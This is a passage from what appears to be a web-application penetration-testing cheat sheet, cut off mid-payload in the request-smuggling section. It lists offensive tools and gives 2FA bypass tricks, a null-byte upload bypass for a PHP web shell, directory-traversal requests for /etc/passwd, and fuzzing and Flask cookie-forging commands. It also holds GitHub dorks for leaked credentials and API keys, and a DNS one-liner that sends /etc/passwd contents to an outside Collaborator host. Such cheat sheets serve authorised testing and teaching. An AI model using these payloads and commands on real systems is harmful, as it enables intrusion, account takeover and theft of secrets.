| SSRFIRE | An automated SSRF finder. Just give the domain name and your server and chill! ;) Also has options to find XSS and open redirects | https://github.com/ksharinarayanan/SSRFire |
| SSRFmap | SSRF are often used to leverage actions on other services, this framework aims to find and exploit these services easily. | https://github.com/swisskyrepo/SSRFmap |
| SSRF testing resources | SSRF (Server Side Request Forgery) testing resources | https://github.com/cujanovic/SSRF-Testing |
| SSTImap | Automatic SSTI detection tool with interactive interface | https://github.com/vladko312/SSTImap |
| toxssin | An XSS exploitation command-line interface and payload generator. | https://github.com/t3l3machus/toxssin |
| Tplmap | Server-Side Template Injection and Code Injection Detection and Exploitation Tool | https://github.com/epinna/tplmap |
| truffleHog | Find leaked credentials. | https://github.com/trufflesecurity/truffleHog |
| unfurl | Pull out bits of URLs provided on stdin | https://github.com/tomnomnom/unfurl |
| waybackurls | Fetch all the URLs that the Wayback Machine knows about for a domain | https://github.com/tomnomnom/waybackurls |
| Webhook.site | Webhook.site lets you easily inspect, test and automate (with the visual Custom Actions builder, or WebhookScript) any incoming HTTP request or e-mail. | https://webhook.site |
| Weird Proxies | It's a cheat sheet about behaviour of various reverse proxies and related attacks. | https://github.com/GrrrDog/weird_proxies |
| Wfuzz | Wfuzz - The Web Fuzzer | https://github.com/xmendez/wfuzz |
| WhatWeb | Next generation web scanner | https://github.com/urbanadventurer/WhatWeb |
| WPScan | WordPress Security Scanner | https://github.com/wpscanteam/wpscan |
| x8 | Hidden parameters discovery suite written in Rust. | https://github.com/Sh1Yo/x8 |
| XSRFProbe | The Prime Cross Site Request Forgery Audit & Exploitation Toolkit. | https://github.com/0xInfection/XSRFProbe |
| XSStrike | Most advanced XSS scanner. | https://github.com/s0md3v/XSStrike |
| ysoserial | A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. | https://github.com/frohoff/ysoserial |
## 2FA Bypass Techniques
### 1. Response Manipulation
If the value `"success":false` can be found in the response, change it to `"success":true`.
### 2. Status Code Manipulation
If theStatus Code is `4xx` try to change it to `200 OK` and see if it bypasses restrictions.
### 3. 2FA Code Leakage in Response
Check the response of the `2FA Code Triggering Request` to see if the code is leaked.
### 4. JS File Analysis
Rare but some `JS Files` may contain info about the `2FA Code`, worth giving a shot.
### 5. 2FA Code Reusability
Same code can be reused.
### 6. Lack of Brute-Force Protection
Possible to `Brute-Force` any length 2FA Code.
### 7. Missing 2FA Code Integrity Validation
Code for `any` user account can be used to bypass the 2FA.
### 8. CSRF on 2FA Disabling
No `CSRF Protection` on `Disable 2FA`, also there is no `Authentication Confirmation`.
### 9. Password Reset Disable 2FA
2FA gets disabled on `Password Change or Email Change`.
### 10. Clickjacking on 2FA Disabling Page
Put an `Iframe` on the `2FA Disabling Page` and use `Social Engineering` to trick the victim to disable 2FA.
### 11. Bypass 2FA with null or 000000
Enter the code `000000` or `null` to bypass 2FA protection.
#### Steps:
1. Enter `null` in 2FA code.
2. Enter `000000` in 2FA code.
3. Send empty code - Someone found this in Grammarly.
4. Open a new tab in the same browser and check if other `API Endpoints` are accessible without entering 2FA.
### 12. Google Authenticator Bypass
#### Steps:
1. Set-up Google Authenticator for 2FA.
2. Now, 2FA is enabled.
3. Go on the `Password Reset Page` and `change` your `password`.
4. If your website redirects you to your dashboard then `2FA (Google Authenticator)` is bypassed.
### 13. Bypassing OTP in Registration Forms by repeating the Form Eubmission multiple Times using Repeater
#### Steps:
1. Create an account with a `non-existing` phone number.
2. Intercept the request in `Burp Suite`.
3. Send the request to the repeater and forward.
4. Go to the Repeater tab and `change` the `non-existent` phone number to your phone number.
5. If you got an OTP to your phone, try using that OTP to register that non-existent number.
## 403 Bypass
### HTTP Header Payload
```c
$ curl -I http:// -H "X-Client-IP: 127.0.0.1"
$ curl -I http:// -H "X-CLIENT-IP: 127.0.0.1"
$ curl -I http:// -H "X-Client-Ip: 127.0.0.1"
```
## Asset Discovery
```c
$ curl -s -k "https://jldc.me/anubis/subdomains/example.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sed '/^\./d'
```
## Burp Suite
> https://portswigger.net/burp
### Filter Options
- Proxy > Options > Intercept Client Requets > Is in target scope
- Proxy > Options > Intercept Server Responses > Is in target scope
### Shortcuts
```c
Ctrl+r // Sending request to repeater
Ctrl+i // Sending request to intruder
Ctrl+Shift+b // base64 encoding
Ctrl+Shift+u // URL decoding
```
### Tweaks
Burp Suite > Proxy > Proxy settings > TLS pass through
```c
.*\.google\.com
.*\.gstatic\.com
.*\.mozilla\.com
.*\.googleapis\.com
.*\.pki\.google\.com
```
### Set Proxy Environment Variables
```c
$ export http_proxy=http://localhost:8080
$ export https_proxy=https://localhost:8080
$ http_proxy=localhost:8080 https_proxy=localhost:8080
```
### Extensions
- 5GC API Parser
- 403 Bypasser
- Active Scan++
- Asset Discovery
- Autorize
- Backslash Powered Scanner
- CO2
- Collaborator Everywhere
- Distribute Damage
- Encode IP
- GAP
- IIS Tilde
- IP Rotate
- J2EEScan
- JS Link Finder
- JS Miner
- JSON Web Tokens
- Logger++
- Log Viewer
- Look Over There
- Param Miner
- SAML Raider
- Software Vulnerability Scanner
- SQLiPy Sqlmap Integration
- Upload Scanner
- ViewState Editor
### Filter for SSRF (AutoRepeater)
```c
((?:[a-zA-Z]{1,10}://|//)[^"'/]{1,}\.[a-zA-Z]{2,}[^"']{0,})
```
## Bypassing File Upload Restrictions
* file.php -> file.jpg
* file.php -> file.php.jpg
* file.asp -> file.asp;.jpg
* file.gif (contains php code, but starts with string GIF/GIF98)
* 00%
* file.jpg with php backdoor in exif (see below)
* .jpg -> proxy intercept -> rename to .php
### PDF Upload Filter Bypass
Create a `PHP Reverse / Web Shell`, name it `shell.phpX.pdf` and `zip` it.
```c
$ touch shell.phpX.pdf
$ zip shell.zip shell.phpX.pdf
```
Open the `Zip Archive` in your favourite `Hex Editor`.
```c
00000A80 00 01 00 00 00 A4 81 00 00 00 00 73 68 65 6C 6C ...........shell
00000A90 2E 70 68 70 58 2E 70 64 66 55 54 05 00 03 A3 6F .phpX.pdfUT....o
```
Replace the `X` with `Null Bytes (00)` and save it.
```c
00000A80 00 01 00 00 00 A4 81 00 00 00 00 73 68 65 6C 6C ...........shell
00000A90 2E 70 68 70 00 2E 70 64 66 55 54 05 00 03 A3 6F .php..pdfUT....o
```
After uploading you can remove the `space` and access the file.
## cadaver
### General Usage
```c
$ cadaver http:////
```
### Common Commands
```c
dav://> cd C
dav://C/> ls
dav://C/> put
```
## Command Injection
### Vulnerable Functions in PHP
* Exec
* Passthru
* System
### Input Sanitisation
* filter_input
### Filter Bypass
```c
$payload = "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
```
## commix
```c
$ python3 commix.py --url="http://:5013/graphql" --data='{"query":"query{systemDebug(arg:\"test \")}"}' -p arg
```
## Common File Extensions
```c
7z,action,ashx,asp,aspx,backup,bak,bz,c,cgi,conf,config,dat,db,dhtml,do,doc,docm,docx,dot,dotm,go,htm,html,ini,jar,java,js,js.map,json,jsp,jsp.source,jspx,jsx,log,old,pdb,pdf,phtm,phtml,pl,py,pyc,pyz,rar,rhtml,shtm,shtml,sql,sqlite3,svc,tar,tar.bz2,tar.gz,tsx,txt,wsdl,xhtm,xhtml,xls,xlsm,xlst,xlsx,xltm,xml,zip
```
```c
.7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.dot,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.phtml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,.xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip
```
## curl
### Common Commands
```c
$ curl --trace - http://
```
### Uploading Files through Upload Forms
#### POST File
```c
$ curl -X POST -F "file=@/PATH/TO/FILE/.php" http:///.php --cookie "cookie"
```
#### POST Binary Data to Web Form
```c
$ curl -F "field=/.php -F 'k=v' --cookie "k=v;" -F "submit=true" -L -v
```
## davtest
```c
$ davtest -auth : -sendbd auto -url http:////
```
## DirBuster
> https://github.com/KajanM/DirBuster
```c
-r // don't search recursively
-w // scan with big wordlists
$ dirb http://
```
## Directory Traversal Attack
### Skeleton Payload Request
```c
GET /../../../../../../../../etc/passwd HTTP/1.1
Host: :
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://:/
Upgrade-Insecure-Requests: 1
```
### Read /etc/passwd
```c
GET // HTTP/1.1
Host: :
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://:/
Upgrade-Insecure-Requests: 1GET /../../../../../../../../etc/passwd HTTP/1.1
```
## dirsearch
> https://github.com/maurosoria/dirsearch
### General Usage
```c
-i // includes specific status codes
-e // excludes specific status codes
-m // specifies HTTP method
```
### Common Commands
```c
$ dirsearch -u http://:
$ dirsearch -u http://: -m POST
$ dirsearch -u http://: -e *
$ dirsearch -u http://:/ -R 5 -e http,php,html,css /usr/share/wordlists/wfuzz/webservices/ws-dirs.txt
```
## DNS Smuggling
```c
GETID=$(cat /etc/passwd | head -n 1 | base64) && nslookup $GETID.0wdj2957gw6t7g5463t7063hy.burpcollborator.net
```
## DS_Walk
> https://github.com/Keramas/DS_Walk
```c
$ python ds_walk.py -u http://
```
## Favicon
> https://wiki.owasp.org/index.php/OWASP_favicon_database
```c
$ curl https:///sites/favicon/images/favicon.ico | md5sum
```
## feroxbuster
> https://github.com/epi052/feroxbuster
```c
$ feroxbuster -u http:// -x js,bak,txt,png,jpg,jpeg,php,aspx,html --extract-links
```
## ffuf
> https://github.com/ffuf/ffuf
```c
$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http:///FUZZ --fs -mc all
$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http:///FUZZ --fw -mc all
$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http:///FUZZ -mc 200,204,301,302,307,401 -o results.txt
$ ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http:/// -H "Host: FUZZ." -fs 185
$ ffuf -c -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u http:///backups/backup_2020070416FUZZ.zip
```
### API Fuzzing
```c
$ ffuf -u https:///api/v2/FUZZ -w api_seen_in_wild.txt -c -ac -t 250 -fc 400,404,412
```
### Searching for LFI
```c
$ ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http:///admin../admin_staging/index.php?page=FUZZ -fs 15349
```
### Fuzzing with PHP Session ID
```c
$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -u "http:///admin/FUZZ.php" -b "PHPSESSID=a0mjo6ukbkq271nb2rkb1joamp" -fw 2644
```
### Fuzzing with HTTP Request File
```c
$ ffuf -w /usr/share/seclists/Fuzzing/6-digits-000000-999999.txt -request -request-proto "https" -mc 302 -t 150 | tee progress
```
### Testing
> http://fuff.me
#### Basic
```c
$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://ffuf.me/cd/basic/FUZZ
```
#### Recursion
```c
$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://ffuf.me/cd/basic/FUZZ -recursion
```
#### File Extensions
```c
$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://ffuf.me/cd/ext/logs/FUZZ -e .log
```
#### No 404 Header
```c
$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://ffuf.me/cd/no404/FUZZ -fs 669
```
#### Param Mining
```c
$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://ffuf.me/cd/param/data?FUZZ=1
```
#### Rate Limiting
```c
$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 5 -p 0.1 -u http://ffuf.test/cd/rate/FUZZ -mc 200,429
```
#### IDOR Testing
```c
$ seq 1 1000 | ffuf -w - -u http://ffuf.me/cd/pipes/user?id=FUZZ
```
#### Script for IDOR Testing
```c
#!/bin/bash
while read i
do
if [ "$1" == "md5" ]; then
echo -n $i | md5sum | awk '{ print $1 }'
elif [ "$1" == "b64" ]; then
echo -n $i | base64
else
echo $i
fi
done
```
#### Use Script above for Base64 decoding
```c
$ seq 1 1000 | /usr/local/bin/hashit b64 | ffuf -w - -u http://ffuf.me/cd/pipes/user2?id=FUZZ
```
#### MD5 Discovery using the Script
```c
$ seq 1 1000 | /usr/local/bin/hashit md5 | ffuf -w - -u http://ffuf.me/cd/pipes/user3?id=FUZZ
```
#### Virtual Host Discovery
```c
$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.ffuf.me" -u http://ffuf.me -fs 1495
```
#### Massive File Extension Discovery
```c
$ ffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http:///FUZZ -t 30 -c -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -mc 200,204,301,302,307,401,403,500 -ic -e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.dot,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.phtml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,.xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip
```
## Flask-Unsign
> https://github.com/Paradoxis/Flask-Unsign
```c
$ pip3 install flask-unsign
```
### Decode Cookie
```c
$ flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'
```
### Brute Force
```c
$ flask-unsign --unsign --cookie < cookie.txt
```
### Unsigning a Cookie
```c
$ flask-unsign --unsign --no-literal-eval --wordlist /PATH/TO/WORDLIST/.txt --cookie eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiZm9vYmFyIn0.Yq4QPw.0Hj2xCfDMJi7ksNfR4Oe9yN7nYQ
```
### Signing a Cookie
```c
$ flask-unsign --sign --legacy --secret '' --cookie "{'logged_in': True, 'username': ''}"
```
### Signing a UUID Cookie
```c
$ flask-unsign --sign --cookie "{'logged_in': True}" --secret ''
$ flask-unsign --sign --cookie "{'cart_items': ["2" , "5" , "6"], 'uuid': 'e9e62997-0291-4f63-8dbe-10d035326c75' }" --secret ''
```
## gf
> https://github.com/tomnomnom/gf
```c
$ go install github.com/tomnomnom/gf@latest
```
## GitHub
### OpenAI API Key Code Search
```c
https://github.com/search?q=%2F%22sk-%5Ba-zA-Z0-9%5D%7B20%2C50%7D%22%2F&ref=simplesearch&type=code
```
### GitHub Dorks
> https://github.com/search?type=code
```c
/ftp:\/\/.*:.*@.*target\.com/
/ftp:\/\/.*:.*@.*\.*\.br/
/ftp:\/\/.*?@.*?\.com\.br/
/ssh:\/\/.*:.*@.*target\.com/
/ssh:\/\/.*:.*@.*\.*\.*\.br/
/ldap:\/\/.*:.*@.*\.*\.*\.com/
/mysql:\/\/.*:.*@.*\.*\.*\.com/
/mongodb:\/\/.*:.*@.*\.*\.*\.com/
/ldaps:\/\/.*:.*@.*\.*\.*\.com/
```
## GitTools
> https://github.com/internetwache/GitTools
### gitdumper
```c
$ ./gitdumper.sh http:///.git/ /PATH/TO/FOLDER
```
### extractor
```c
$ ./extractor.sh /PATH/TO/FOLDER/ /PATH/TO/FOLDER/
```
## GIXY
> https://github.com/yandex/gixy
```c
$ pip install gixy
$ gixy /etc/nginx/nginx.conf
```
## Gobuster
> https://github.com/OJ/gobuster
```c
-e // extended mode that renders the full url
-k // skip ssl certificate validation
-r // follow cedirects
-s // status codes
-b // exclude status codes
-k // ignore certificates
--wildcard // set wildcard option
$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http:///
$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http:/// -x php
$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http:/// -x php,txt,html,js -e -s 200
$ gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 50 -k --exclude-length
$ gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u https://:/ -b 200 -k --wildcard
```
### POST Requests
```c
$ gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http:///api/ -e -s 200
```
### DNS Recon
```c
$ gobuster dns -d -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
$ gobuster dns -d -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
```
### VHost Discovery
```c
$ gobuster vhost -u -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
$ gobuster vhost -u -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
```
### Specifiy User Agent
```c
$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http:/// -a Linux
```
## gron
> https://github.com/tomnomnom/gron
```c
$ go install github.com/tomnomnom/gron@latest
```
## hakcheckurl
> https://github.com/hakluke/hakcheckurl
```c
$ go install github.com/hakluke/hakcheckurl@latest
```
## Hakrawler
> https://github.com/hakluke/hakrawler
```c
$ hakrawler -url -depth 3
$ hakrawler -url -depth 3 -plain
$ hakrawler -url -depth 3 -plain | httpx -http-proxy http://127.0.0.1:8080
```
## Host Header Regex Bypass
### Skeleton Payload Request
```c
POST /password-reset.php HTTP/1.1
Host: gymxcrossfit.htb/employees.crossfit.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://employees.crossfit.htb
DNT: 1
Connection: close
Referer: http://employees.crossfit.htb/password-reset.php
Upgrade-Insecure-Requests: 1
email=david.palmer%40crossfit.htb
...
Host: gymxcrossfit.htb/employees.crossfit.htb # <--- Host Header getting set after the "/" so we can bypass the regex by adding this line
...
```
## HTML Injection
> https://hackerone.com/reports/724153
```c
FilenametestBOLD
```
### Skeleton Payload
```c
x=new XMLHttpRequest;
x.onload=function(){
document.write(this.responseText)
};
x.open("GET","file:///etc/passwd");
x.send();
```
## HTTP Request Methods
### HTTP GET
- Retrieve a single item or a list of items
```c
GET /v1/products/foobar
```
```c
$ curl -v -X GET -k https://example.com 80
```
#### Response
```c
foobar
foobar
This is foobar
```
### HTTP PUT
- Update an item
```c
PUT /v1/users/123
```
#### Request Body
```c
{"name": "bob", "email": "[email protected]"}
```
#### Response
```c
HTTP/1.1 200 OK
```
### HTTP POST
- Create an item
```c
POST /v1/users
```
#### Request Body
```c
{"firstname": "bob", "lastname": "bobber", "email": "[email protected]"}
```
#### Response
```c
HTTP/1.1 201 Created
```
### HTTP DELETE
- Delete an item
```c
DELETE /v1/users/123
```
#### Response
```c
HTTP/1.1 200 OK
HTTP/1.1 204 NO CONTENT
```
### HTTP PATCH
- Partially modify an item
```c
PATCH /v1/users/123
```
#### Request Body
```c
{
"email": "[email protected]"
}
```
#### Response
```c
HTTP/1.1 200 OK
```
### HTTP HEAD
- Identical to GET but no message body in the response
```c
HEAD /v1/products/iphone
```
```c
$ curl -v -X HEAD -k https://example.com 80
```
#### Response
```c
HTTP/1.1 200 OK
```
### HTTP CONNECT
- Create a two-way connection with a proxy server
```c
CONNECT :80
```
#### Request
```c
Host:
Proxy-Authorization: basic UEBzc3dvcmQxMjM=
```
#### Response
```c
HTTP/1.1 200 OK
```
### HTTP OPTIONS
- Return a list of supported HTTP methods
```c
OPTIONS /v1/users
```
```c
$ curl -v -X OPTIONS -k https://example.com 80
```
#### Response
```c
HTTP/1.1 200 OK
Allow: GET,POST,DELETE,HEAD,OPTIONS
```
### HTTP TRACE
- Perform a message loop-back test, providing a debugging mechanism
```c
TRACE /index.html
```
```c
$ curl -v -X TRACE -k https://example.com 80
```
#### Response
```c
Host:
Via:
X-Forwardet-For:
```
## HTTP Request Smuggling / HTTP Desync Attack
### Quick Wins
```c
Content-Length: 0
Connection: Content-Lentgh
```
### Content-Length / Transfer-Encoding (CL.TE)
#### Searching for Vulnerability
```c
POST / HTTP/1.1
Host:
Transfer-Encoding: chunked
Connection: keep-alive
Content-Length: 4
1
A
0
```
#### Skeleton Payload
```c
POST / HTTP/1.1
Host:
Content-Length: 30
Connection: keep-alive
Transfer-Encoding: chunked
\ `0`\
GET /404 HTTP/1.1
Foo: Bar
```
### Transfer-Encoding / Content-Length (TE.CL)
#### Searching for Vulnerability
```c
POST / HTTP/1.1
Host:
Transfer-Encoding: chunked
Connection: keep-alive
Content-Length: 6
0
X
```
#### Skeleton Payload
```c
POST / HTTP/1.1
Host: